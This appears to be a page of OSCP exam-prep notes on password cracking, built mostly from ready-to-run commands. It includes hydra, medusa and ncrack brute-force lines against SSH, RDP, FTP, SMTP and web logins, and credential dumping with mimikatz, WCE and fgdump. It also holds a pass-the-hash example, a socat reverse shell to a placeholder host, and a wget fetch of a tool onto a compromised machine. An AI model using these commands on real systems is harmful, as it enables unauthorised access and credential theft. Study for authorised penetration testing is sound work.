forked from sd-geek/OSCP
-
Notifications
You must be signed in to change notification settings - Fork 14
/
11 - Cracking
167 lines (121 loc) · 5.96 KB
/
11 - Cracking
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
Medusa
medusa -h 10.11.1.227 -U lab-users.txt -P lab-passwords.txt -M ftp | grep "ACCOUNT FOUND"
Ncrack (FTP, SSH, TELNET, HTTP(S), POP3(S), SMB, RDP, VNC)
ncrack -U <[USERS_LIST]> -P <[PASSWORDS_LIST]> ftp://<[IP]>
AES Decryption
http://aesencryption.net/
Convert multiple webpages into a word list
for x in 'index' 'about' 'post' 'contact' ; do curl http://$ip/$x.html | html2markdown | tr -s ' ' '\n' >> webapp.txt ; done
Or convert html to word list dict
html2dic index.html.out | sort -u > index-html.dict
--------------- Default Usernames and Passwords ---------------
CIRT
http://www.cirt.net/passwords
Government Security - Default Logins and Passwords for Networked Devices
http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php
Virus.org
http://www.virus.org/default-password/
Default Password
http://www.defaultpassword.com/
--------------- Brute Force ---------------
Nmap Brute forcing Scripts
https://nmap.org/nsedoc/categories/brute.html
Nmap Generic auto detect brute force attack
nmap --script brute -Pn <target.com or ip> <enter>
MySQL nmap brute force attack
nmap --script=mysql-brute $ip
--------------- Dictionary Files ---------------
Word lists on Kali
cd /usr/share/wordlists
Key-space Brute Force
crunch 6 6 0123456789ABCDEF -o crunch1.txt
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
crunch 8 8 -t ,@@^^%%%
Pwdump and Fgdump - Security Accounts Manager (SAM)
pwdump.exe - attempts to extract password hashes
fgdump.exe - attempts to kill local antiviruses before attempting to dump the password hashes and cached credentials.
Windows Credential Editor (WCE)
allows one to perform several attacks to obtain clear text passwords and hashes
wce -w
Mimikatz
extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets
https://github.com/gentilkiwi/mimikatz From metasploit meterpreter (must have System level access): meterpreter> load mimikatz meterpreter> help mimikatz meterpreter> msv meterpreter> kerberos meterpreter> mimikatz_command -f samdump::hashes meterpreter> mimikatz_command -f sekurlsa::searchPasswords
--------------- Password Profiling ---------------
cewl can generate a password list from a web page
# cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt
Password Mutating
John the ripper can mutate password lists
nano /etc/john/john.conf
john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt
Medusa
Medusa, initiated against an htaccess protected web directory
medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10
Ncrack
ncrack (from the makers of nmap) can brute force RDP
ncrack -vv --user offsec -P password-file.txt rdp://$ip
Hydra
Hydra brute force against SNMP
# hydra -P password-file.txt -v $ip snmp
Hydra FTP known user and password list
#hydra -t 1 -l admin -P /root/Desktop/password.lst -vV $ip ftp
Hydra SSH using list of users and passwords
hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh
Hydra SSH using a known password and a username list
hydra -v -V -u -L users.txt -p "<known password>" -t 1 -u $ip ssh
Hydra SSH Against Known username on port 22
hydra $ip -s 22 ssh -l <user> -P big\_wordlist.txt
Hydra POP3 Brute Force
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V
Hydra SMTP Brute Force
hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V
Hydra attack http get 401 login with a dictionary
hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin
Hydra attack Windows Remote Desktop with rockyou
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
--------------- Password Hash Attacks ---------------
Online Password Cracking
https://crackstation.net/
Hashcat running on
Sample Hashes
http://openwall.info/wiki/john/sample-hashes
Identify Hashes
hash-identifier
Crask linux hashes you must first unshadow them:
unshadow passwd-file.txt shadow-file.txt
unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
John the Ripper - Password Hash Cracking
john $ip.pwdump
john --wordlist=/usr/share/wordlists/rockyou.txt hashes
john --rules --wordlist=/usr/share/wordlists/rockyou.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
JTR forced descrypt cracking with wordlist
john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt
JTR forced descrypt brute force cracking
john --format=descrypt hash --show
Passing the Hash in Windows
Use Metasploit to exploit one of the SMB servers in the labs. Dump the password hashes and attempt a pass-the-hash attack against another system:
export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896
# pth-winexe -U administrator //$ip cmd
Cracking zip file password
# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u <filename>.zip
# frackzip -D -v -u -p /usr/share/wordlists/rockyou.txt <file>
Cracking 7zip
# ./7x2john.pl file.7z > 7zhash
# john 7zhash --wordlist:/usr/share/wordlists/rockyou.txt
Cracking rsa hash
# python ssh2john.py id_rsa > id_rsa.hash
# john id_rsa.hash --wordlist:/usr/share/wordlists/rockyou.txt
su crack
https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP ADDRESS>:<PORT>
https://labs.portcullis.co.uk/tools/sucrack/
From local machine
# tar -xvf sucrack-1.2.3.tar.gz
# cd sucrack-1.2.3
# ./configure
# make
# tar -cvf sucrack.tar sucrack-1.2.3/
From remote machine
# wget http://<local ip>/sucrack
# tar xvf sucrack.tar
./sucrack -u root -w 10 /<dict file>